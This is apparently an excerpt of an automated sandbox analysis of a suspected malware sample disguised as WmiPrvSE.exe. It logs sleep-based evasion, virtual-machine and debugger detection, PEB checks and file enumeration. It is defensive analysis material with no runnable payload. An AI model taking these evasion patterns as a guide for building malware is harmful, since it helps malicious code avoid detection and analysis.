Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -896671s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -896562s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -896432s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep count: 5906 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899889s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899781s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899665s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep count: 1752 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899561s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899344s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899219s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -899109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898997s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898850s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898714s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898576s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898466s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898359s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898242s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -898015s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897902s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897795s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897672s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897563s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897343s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897105s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -897000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -896890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -896770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 8199 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 1208 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\WmiPrvSE.exe TID: 7696	Thread sleep count: 1847 > 30
Source: C:\Users\Public\WmiPrvSE.exe TID: 7696	Thread sleep time: -18470000s >= -30000s
Source: C:\Users\Public\WmiPrvSE.exe TID: 4788	Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\WmiPrvSE.exe TID: 7696	Thread sleep count: 8069 > 30
Source: C:\Users\Public\WmiPrvSE.exe TID: 7696	Thread sleep time: -80690000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\Public\WmiPrvSE.exe	Last function: Thread delayed
Source: C:\Users\Public\WmiPrvSE.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0007A1F0 FindFirstFileW,CreateFileW,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,GetModuleFileNameW,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose,	4_2_0007A1F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0007C450 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW,	4_2_0007C450
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00084AF0 FindFirstFileW,GetLastError,FindClose,	4_2_00084AF0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00091870 FindFirstFileW,FindClose,FindClose,	4_2_00091870
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A60A0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	4_2_000A60A0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000E4329 FindFirstFileExW,	4_2_000E4329
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A48F0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	4_2_000A48F0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000A4CC0 FindFirstFileW,FindClose,	4_2_000A4CC0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_0009CE70 FindFirstFileW,FindClose,	4_2_0009CE70
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000619C0 FindFirstFileW,FindNextFileW,FindClose,	4_2_000619C0
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00081D00 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,	4_2_00081D00
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_00085E00 FindFirstFileW,FindClose,	4_2_00085E00
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB2440BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7BB2440BC
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB25B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	5_2_00007FF7BB25B190
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe	Code function: 5_2_00007FF7BB26FCA0 FindFirstFileExA,	5_2_00007FF7BB26FCA0
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00779220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,	23_2_00779220
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00771C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,	23_2_00771C30

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000A3790 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

4_2_000A3790

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000B1900 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,

4_2_000B1900

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899796	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899669	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899695
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899577
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899465
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899009
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898136
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898001
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897843
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897718
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897261
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897043
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896922
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896134
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899531
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899421
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899306
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899201
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898654
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898491
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898354
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898131
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897795
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897233
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897112
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896779
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896671
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896432
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899665
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898997
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898850
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898714
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898359
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898242
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897795
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897105
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896770
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\WmiPrvSE.exe	Thread delayed: delay time: 60000

Source: aipackagechainer.exe, 00000004.00000002.1446471405.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}N
Source: WmiPrvSE.exe, 00000017.00000002.3871035138.000000000083C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: aipackagechainer.exe, 00000004.00000002.1446471405.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000009.00000002.1611147208.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1615957365.0000000007DB0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Desktop.exe, 00000005.00000003.1435021839.000002EF11311000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000003.1508246755.0000019C56468000.00000004.00000020.00020000.00000000.sdmp, NDTCN1.dat.5.dr	Binary or memory string: OoXQkMoyUnLhWlT+LXGI2ToyIOGNhRJSzf8EUsFBB1IWUQemuV7nJrF2l62BXu+l
Source: WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_@<J
Source: powershell.exe, 00000009.00000002.1611147208.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW)]=

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\Public\WmiPrvSE.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_000CA05B IsDebuggerPresent,OutputDebugStringW,

4_2_000CA05B

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_00088880 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

4_2_00088880

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

Code function: 4_2_00087860 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,

4_2_00087860

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000CA36E mov esi, dword ptr fs:[00000030h]	4_2_000CA36E
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000DAAA5 mov ecx, dword ptr fs:[00000030h]	4_2_000DAAA5
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000DFC5F mov eax, dword ptr fs:[00000030h]	4_2_000DFC5F
Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe	Code function: 4_2_000DFCA3 mov eax, dword ptr fs:[00000030h]	4_2_000DFCA3

Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe

